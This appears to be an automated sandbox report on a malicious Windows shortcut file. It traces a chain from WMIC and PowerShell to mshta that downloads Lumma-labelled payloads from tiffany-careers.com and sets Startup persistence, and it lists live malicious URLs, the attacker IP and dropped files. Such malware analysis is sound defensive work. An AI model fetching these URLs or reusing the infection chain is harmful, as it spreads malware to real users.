Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656042BCF GetUserNameW,16_2_00007FF656042BCF
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656022650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,16_2_00007FF656022650
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656001D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,16_2_00007FF656001D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: powershell.exe, 00000015.00000002.1920189154.00000217E3274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1815831767.00000217CB542000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1815831767.00000217CB542000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1813369831.00000217C9344000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920633471.00000217E32AD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920189154.00000217E3274000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1926160809.00000217E3541000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1815232326.0000000001C30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1819991888.0000000001C30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1831064409.0000000001C30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1836228521.0000000004801000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1830489454.0000000001C30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1810953959.0000000001C30000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1830342741.0000000001C30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: BnQwAP.exe, 00000010.00000002.1753379248.00000295A1999000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920633471.00000217E32DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1926160809.00000217E3565000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1920189154.00000217E3274000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CB0A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CB542000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1815831767.00000217CB542000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1920189154.00000217E3274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vs}\Public\Guard.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: BnQwAP.exeBinary or memory string: WIN_81
Source: BnQwAP.exeBinary or memory string: WIN_XP
Source: BnQwAP.exeBinary or memory string: WIN_XPe
Source: BnQwAP.exeBinary or memory string: WIN_VISTA
Source: BnQwAP.exe.9.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: BnQwAP.exeBinary or memory string: WIN_7
Source: BnQwAP.exeBinary or memory string: WIN_8
Source: Guard.exe.17.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656074074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00007FF656074074
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656073940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,16_2_00007FF656073940

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		2
Valid Accounts		211
Windows Management Instrumentation		1
Scripting		1
Exploitation for Privilege Escalation		2
Disable or Modify Tools		11
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol1
Email Collection		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter		2
Valid Accounts		2
Valid Accounts		2
Obfuscated Files or Information		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin Shares11
Input Capture		2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
PowerShell		2
Registry Run Keys / Startup Folder		21
Access Token Manipulation		1
Timestomp		NTDS38
System Information Discovery		Distributed Component Object Model3
Clipboard Data		13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection		1
DLL Side-Loading		LSA Secrets161
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder		231
Masquerading		Cached Domain Credentials31
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
Valid Accounts		DCSync13
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
Virtualization/Sandbox Evasion		Proc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
Access Token Manipulation		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
Process Injection		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579656 Sample: lKin1m7Pf2.lnk Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 94 x1.i.lencr.org 2->94 96 tiffany-careers.com 2->96 98 4 other IPs or domains 2->98 108 Suricata IDS alerts for network traffic 2->108 110 Windows shortcut file (LNK) starts blacklisted processes 2->110 112 Multi AV Scanner detection for dropped file 2->112 114 15 other signatures 2->114 15 WMIC.exe 1 2->15         started        18 wscript.exe 2->18         started        20 svchost.exe 1 1 2->20         started        signatures3 process4 dnsIp5 138 Contains functionality to create processes via WMI 15->138 140 Creates processes via WMI 15->140 23 powershell.exe 7 15->23         started        26 conhost.exe 1 15->26         started        142 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->142 28 SwiftWrite.pif 18->28         started        102 127.0.0.1 unknown unknown 20->102 signatures6 process7 signatures8 120 Windows shortcut file (LNK) starts blacklisted processes 23->120 122 Drops PE files to the user root directory 23->122 124 Powershell drops PE file 23->124 30 powershell.exe 7 23->30         started        33 conhost.exe 23->33         started        process9 signatures10 136 Windows shortcut file (LNK) starts blacklisted processes 30->136 35 mshta.exe 16 30->35         started        process11 dnsIp12 100 tiffany-careers.com 147.45.49.155, 443, 49704, 49708 FREE-NET-ASFREEnetEU Russian Federation 35->100 78 C:\Users\user\AppData\Local\...\duychuan1[1], PE32 35->78 dropped 116 Windows shortcut file (LNK) starts blacklisted processes 35->116 118 Suspicious powershell command line found 35->118 40 powershell.exe 17 19 35->40         started        file13 signatures14 process15 file16 84 C:\Users\user\AppData\Roaming\BnQwAP.exe, PE32+ 40->84 dropped 126 Binary is likely a compiled AutoIt script file 40->126 44 BnQwAP.exe 40->44         started        48 Acrobat.exe 67 40->48         started        50 MpCmdRun.exe 40->50         started        52 conhost.exe 40->52         started        signatures17 process18 file19 88 C:\Users\Public\PublicProfile.ps1, ASCII 44->88 dropped 128 Windows shortcut file (LNK) starts blacklisted processes 44->128 130 Multi AV Scanner detection for dropped file 44->130 132 Suspicious powershell command line found 44->132 134 2 other signatures 44->134 54 powershell.exe 44->54         started        57 powershell.exe 44->57         started        59 AcroCEF.exe 107 48->59         started        61 conhost.exe 50->61         started        signatures20 process21 file22 80 C:\Users\Public\Secure.au3, Unicode 54->80 dropped 63 Guard.exe 54->63         started        67 conhost.exe 54->67         started        82 C:\Users\Publicbehaviorgraphuard.exe, PE32 57->82 dropped 69 conhost.exe 57->69         started        71 AcroCEF.exe 59->71         started        process23 file24 90 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 63->90 dropped 92 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 63->92 dropped 104 Windows shortcut file (LNK) starts blacklisted processes 63->104 106 Drops PE files with a suspicious file extension 63->106 73 cmd.exe 63->73         started        signatures25 process26 file27 86 C:\Users\user\AppData\...\SwiftWrite.url, MS 73->86 dropped 76 conhost.exe 73->76         started        process28

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
lKin1m7Pf2.lnk26%VirustotalBrowse
lKin1m7Pf2.lnk21%ReversingLabsShortcut.Trojan.Pantera

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\Guard.exe8%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\duychuan1[1]39%ReversingLabsWin32.Dropper.Lumma
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif8%ReversingLabs
C:\Users\user\AppData\Roaming\BnQwAP.exe30%ReversingLabsWin64.Downloader.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    		high
    default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
    		217.20.58.99
    		truefalse
      		high
      tiffany-careers.com
      		147.45.49.155
      		truefalse
        		high
        x1.i.lencr.org
        		unknown
        		unknownfalse
          		high
          nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://tiffany-careers.com/Job_Description.pdftrue
              		unknown
              https://tiffany-careers.com/kfSlwlOtrue
                		unknown
                https://tiffany-careers.com/jzuVDmQ.txttrue
                  		unknown
                  https://tiffany-careers.com/duychuan1true
                    		unknown
                    https://tiffany-careers.com/BnQwAP.exetrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://tiffany-careers.com/BnQwAP.powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://www.autoitscript.com/autoit3/JGuard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000000.1808350972.0000000000489000.00000002.00000001.01000000.00000010.sdmp, SwiftWrite.pif, 0000001D.00000000.1948220932.0000000000689000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drfalse
                          		high
                          http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.14.drfalse
                              		high
                              https://tiffany-careers.cpowershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                https://tiffany-careers.compowershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1712169554.000001DD3EB85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CB914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CB0A1000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.1712169554.000001DD3E97A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://go.microsoft.copowershell.exe, 00000015.00000002.1919253778.00000217E3258000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.1712169554.000001DD3E97A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://tiffany-careers.com/duychuan1;.powershell.exe, 00000005.00000002.1484360037.000001AADD6D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://tiffany-careers.com/duychuan1$global:?powershell.exefalse
                                            		unknown
                                            https://contoso.com/Licensepowershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://tiffany-careers.com/powershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmptrue
                                                  		unknown
                                                  https://tiffany-careers.com/duychuan1Ppowershell.exe, 00000005.00000002.1484717292.000001AADF7BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000008.00000003.1518226211.000001FEC7ED0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.drfalse
                                                      		high
                                                      https://tiffany-careers.com/Bpowershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://tiffany-careers.com/BnQpowershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.autoitscript.com/autoit3/Guard.exe, 00000017.00000003.1834632731.00000000049CA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr, Guard.exe.17.drfalse
                                                            		high
                                                            https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.1712169554.000001DD3E97A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://tiffany-careers.com/BnQwpowershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://tiffany-careers.com/duychuan1apowershell.exe, 00000005.00000002.1484592899.000001AADEE30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000008.00000003.1518226211.000001FEC7F41000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.drfalse
                                                                    		high
                                                                    https://tiffany-careers.com/BnQwAP.epowershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://tiffany-careers.com/BnQwAPpowershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://tiffany-careers.com/Bnpowershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://contoso.com/powershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.3087042834.000001DD4E7C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://tiffany-careers.com/BnQwAP.expowershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://tiffany-careers.copowershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                  		unknown
                                                                                  https://tiffany-careers.com/duychuan1ppowershell.exe, 00000005.00000002.1484717292.000001AADF5FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1484717292.000001AADF311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://tiffany-careers.com/duychuan1ken=b03f5fpowershell.exe, 00000005.00000002.1487314148.000001AAF73FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://aka.ms/pscore68powershell.exe, 00000005.00000002.1484717292.000001AADF36D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1484717292.000001AADF359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1712169554.000001DD3E751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CAE71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1484717292.000001AADF32D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1712169554.000001DD3E751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CAE71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://tiffany-careers.compowershell.exe, 00000009.00000002.1712169554.000001DD43C26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1815831767.00000217CB91A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://tiffany-careers.com/BnQwApowershell.exe, 00000009.00000002.1712169554.000001DD43B7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              147.45.49.155
                                                                                              		tiffany-careers.comRussian Federation
                                                                                              		2895FREE-NET-ASFREEnetEUfalse

                                                                                              Private

                                                                                              IP
                                                                                              127.0.0.1

                                                                                              General Information

                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1579656
                                                                                              Start date and time:2024-12-23 07:06:49 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 8m 50s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:30
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Sample name:lKin1m7Pf2.lnk
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:2ddf3f1022cce6aa5fd6c09b5275e47e.lnk
                                                                                              Detection:MAL
                                                                                              Classification:mal100.expl.evad.winLNK@45/62@4/2
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 33.3%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 97%
                                                                                              • Number of executed functions: 49
                                                                                              • Number of non-executed functions: 247
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .lnk

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 217.20.58.99, 23.218.208.137, 162.159.61.3, 172.64.41.3, 18.213.11.84, 34.237.241.83, 54.224.241.105, 50.16.47.176, 23.195.39.65, 184.30.20.134, 23.32.238.137, 23.32.238.161, 2.19.198.65, 23.32.238.160, 23.32.238.155, 2.19.198.74, 2.19.198.42, 2.19.198.49, 2.19.198.66, 23.32.238.122, 23.32.238.96, 2.19.198.48, 2.19.198.40, 23.32.238.128, 20.12.23.50, 52.22.41.97, 13.107.246.63
                                                                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 3428 because it is empty
                                                                                              • Execution Graph export aborted for target powershell.exe, PID 6200 because it is empty
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              01:07:48API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                              01:07:54API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                              01:07:55API Interceptor1x Sleep call for process: mshta.exe modified
                                                                                              01:07:56API Interceptor127x Sleep call for process: powershell.exe modified
                                                                                              01:08:18API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                                                              01:08:31API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                              01:09:03API Interceptor37x Sleep call for process: Guard.exe modified
                                                                                              01:09:21API Interceptor1x Sleep call for process: SwiftWrite.pif modified
                                                                                              07:08:27AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              147.45.49.155R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                              • tiffany-careers.com/PefjSkkhb.exe
                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                              • tiffany-careers.com/BFmcYQ.exe
                                                                                              duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                              • tiffany-careers.com/PefjSkkhb.exe

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              bg.microsoft.map.fastly.netfKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 199.232.214.172
                                                                                              #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              Support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                              • 199.232.214.172
                                                                                              #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                              • 199.232.214.172
                                                                                              Company Information.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                              • 199.232.210.172
                                                                                              HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                              • 199.232.210.172
                                                                                              1734733987ee1a8345da831d1ecbca38d8a0fdc4854f6779b69f21209db7e0a6d5a2d91fd2237.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                              • 199.232.210.172
                                                                                              1734732186278e5c87d1a316617c1125acd5c32aedeebfd021b1e761647265ea7426c527bd565.dat-decoded.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                              • 199.232.214.172
                                                                                              default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comfKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 217.20.58.100
                                                                                              uDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                              • 217.20.58.99
                                                                                              data.exeGet hashmaliciousUnknownBrowse
                                                                                              • 217.20.58.99
                                                                                              4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                              • 217.20.58.100
                                                                                              YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                              • 217.20.58.99
                                                                                              gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 217.20.58.99
                                                                                              H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 84.201.212.68
                                                                                              H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 217.20.58.100
                                                                                              KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 217.20.58.100
                                                                                              1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 84.201.211.18
                                                                                              tiffany-careers.comR4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              FREE-NET-ASFREEnetEUjqplot.htaGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.112.248
